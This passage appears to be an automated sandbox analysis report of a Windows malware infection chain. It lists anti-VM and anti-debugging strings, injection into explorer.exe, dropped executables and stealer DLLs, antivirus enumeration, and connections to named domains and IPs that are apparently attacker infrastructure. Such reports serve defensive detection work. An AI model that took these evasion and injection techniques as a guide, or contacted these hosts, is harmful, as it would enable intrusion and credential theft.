SCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259YzFS9jjzkdsVw7SnXG/aVBu6AqxTNfh3rCwpPaxZRnkaWDCit007OnU0BV0JXUgMCxrwTl2WwFQxU/LnW/UVS0qxq8JJsmcPbrc6XK5VnbK/BnbnGz/DotlsOegmFuoYo8LmOqZDgaBhy/iy2aYdr8Lmusp/26uFlRKlPdxutXC1gAxdDbdqVd2omKChoad8tX0Sej9GwU1Jtq5eNpuONG4sea3az7wTgV0NWyPoP/OE9yx2ZG4G2
                Source: D804.exe, 00000006.00000002.450438133.0000000000707000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                Source: D804.exe, 00000010.00000002.619429561.0000000000808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: D804.exe, 00000006.00000002.450438133.000000000075C000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000006.00000003.445434280.000000000075C000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000010.00000003.452471512.0000000000891000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000003.452681314.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.477923447.000001E29016F000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E29016F000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.489839300.000001E29016F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000001.00000000.369535854.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: 3C54.exe, 00000014.00000000.455817498.00000000004A2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: DetectVirtualMachine
                Source: aafg31.exe, 00000015.00000003.477923447.000001E29016F000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E29016F000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.489839300.000001E29016F000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.485848498.000001E29016F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWg
                Source: 3C54.exe, 00000014.00000000.455817498.00000000004A2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: <Module>power.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributepowerEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksu3g1msyl5i1.resources
                Source: explorer.exe, 00000001.00000000.369535854.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
                Source: D804.exe, 00000013.00000003.452681314.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
                Source: explorer.exe, 00000001.00000000.363366539.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
                Source: B46F.exe, 0000001A.00000002.489404633.0000000000687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: D804.exe, 00000006.00000002.450883954.0000000002F30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\d0-
                Source: B46F.exe, 0000001A.00000002.489404633.0000000000687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: explorer.exe, 00000001.00000000.369535854.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
                Source: B46F.exe, 0000001A.00000003.479306227.0000000000711000.00000004.00000020.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.489404633.0000000000711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2.3 MAC Layer LightWeight Filter-0000
                Source: D804.exe, 00000006.00000002.450883954.0000000002F30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Registry\Machine\Software\Classes\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 3C54.exe, 00000014.00000000.455817498.00000000004A2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmware
                Source: explorer.exe, 00000001.00000000.366426205.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                Source: explorer.exe, 00000001.00000000.369535854.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
                Source: D804.exe, 00000013.00000002.636070288.0000000003214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: B46F.exe, 0000001A.00000002.489404633.0000000000739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
                Source: 913F.exe, 00000025.00000002.514716181.0000000000667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: explorer.exe, 00000001.00000000.369535854.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
                Source: aafg31.exe, 00000015.00000003.483479878.000001E2901C5000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559711394.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.509760935.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.473601019.000001E2901B4000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.519312532.000001E2901BF000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.522708339.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.488493072.000001E2901C4000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E2901A6000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.489120005.000001E2901C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 80ehgFS
                Source: explorer.exe, 00000001.00000000.369535854.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                Source: C:\Users\user\Desktop\01860199.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\01860199.exeSystem information queried: ModuleInformation

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\01860199.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\hwgujdvSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_0040D6B0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_023F092B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_023F0D90 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_024A50A3 push dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\01860199.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\hwgujdvProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_0040533B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_024A671C rdtsc
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeMemory allocated: page read and write | page guard
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_004084CF SetUnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_0040D9F8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_0040533B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_004063C4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeDomain query: toobussy.com
                Source: C:\Windows\explorer.exeNetwork Connect: 123.140.161.243 80
                Source: C:\Windows\explorer.exeNetwork Connect: 80.66.203.53 443
                Source: C:\Windows\explorer.exeDomain query: colisumy.com
                Source: C:\Windows\explorer.exeDomain query: potunulit.org
                Source: C:\Windows\explorer.exeDomain query: speedlab.com.eg
                Source: C:\Windows\explorer.exeNetwork Connect: 45.9.74.80 80
                Source: C:\Windows\explorer.exeNetwork Connect: 217.174.148.28 443
                Source: C:\Windows\explorer.exeNetwork Connect: 175.119.10.231 80
                Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.7 80
                Source: C:\Windows\explorer.exeNetwork Connect: 211.40.39.251 80
                Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.7 80
                Source: C:\Windows\explorer.exeNetwork Connect: 211.119.84.112 80
                Source: C:\Windows\explorer.exeNetwork Connect: 183.100.39.157 80
                Source: C:\Windows\explorer.exeDomain query: shsplatform.co.uk
                Source: C:\Windows\explorer.exeNetwork Connect: 222.236.49.123 80
                Source: C:\Windows\explorer.exeNetwork Connect: 194.180.48.90 80
                Source: C:\Windows\explorer.exeNetwork Connect: 222.236.49.124 80
                Source: C:\Windows\explorer.exeFile created: 3C54.exe.1.drJump to dropped file
                Source: C:\Users\user\Desktop\01860199.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\Desktop\01860199.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\hwgujdvSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\hwgujdvSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\D804.exeMemory written: C:\Users\user\AppData\Local\Temp\D804.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeMemory written: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\D804.exeMemory written: C:\Users\user\AppData\Local\Temp\D804.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeMemory written: C:\Users\user\AppData\Local\Temp\B46F.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\A170.exeMemory written: C:\Users\user\AppData\Local\Temp\A170.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeMemory written: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\913F.exeMemory written: C:\Users\user\AppData\Local\Temp\913F.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\01860199.exeThread created: C:\Windows\explorer.exe EIP: 5801B14
                Source: C:\Users\user\AppData\Roaming\hwgujdvThread created: unknown EIP: 58A1B14
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeThread created: unknown EIP: 59319C0
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\Temp\D804.exe C:\Users\user\AppData\Local\Temp\D804.exe
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeProcess created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\Temp\D804.exe "C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe"
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess created: C:\Users\user\AppData\Local\Temp\NewPlayer.exe "C:\Users\user\AppData\Local\Temp\NewPlayer.exe"
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
                Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exeProcess created: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe "C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeProcess created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
                Source: C:\Users\user\AppData\Local\Temp\A170.exeProcess created: C:\Users\user\AppData\Local\Temp\A170.exe C:\Users\user\AppData\Local\Temp\A170.exe
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeProcess created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
                Source: C:\Users\user\AppData\Local\Temp\913F.exeProcess created: C:\Users\user\AppData\Local\Temp\913F.exe C:\Users\user\AppData\Local\Temp\913F.exe
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeProcess created: unknown unknown
                Source: explorer.exe, 00000001.00000000.362869781.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
                Source: explorer.exe, 00000001.00000000.366384416.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.362869781.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.369535854.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.362869781.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.362608605.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
                Source: explorer.exe, 00000001.00000000.362869781.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3C54.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\07c6bc37dc5087\clip64.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\07c6bc37dc5087\clip64.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5DA0.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_0040963C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_00403870 GetStringTypeExA,FindFirstVolumeMountPointW,GetPrivateProfileIntA,WaitForSingleObject,FreeConsole,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetVersionExW,GetConsoleAliasesLengthA,SleepEx,CreateFileMappingW,CreateMutexA,GetCommState,FreeConsole,MapGenericMask,DebugBreak,AttachConsole,MapGenericMask,DebugBreak,FreeConsole,AttachConsole,FreeConsole,InterlockedExchangeAdd,WaitForMultipleObjectsEx,GetCharWidthW,GetCharABCWidthsFloatW,GetCharWidthW,GetCharABCWidthsFloatW,GetLastError,GetLastError,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,GetLongPathNameA,WritePrivateProfileStructW,IsBadReadPtr,CancelWaitableTimer,GetFileType,GetModuleHandleA,
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 20.2.3C54.exe.408ef90.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.NewPlayer.exe.60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.mnolyk.exe.e00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.0.NewPlayer.exe.60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.0.mnolyk.exe.e00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.3C54.exe.408ef90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000000.460937652.0000000000061000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.476037262.0000000000061000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.618608332.0000000000E01000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.475540855.0000000000E01000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.507574434.0000000004050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NewPlayer.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED
                Source: Yara matchFile source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.508616217.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
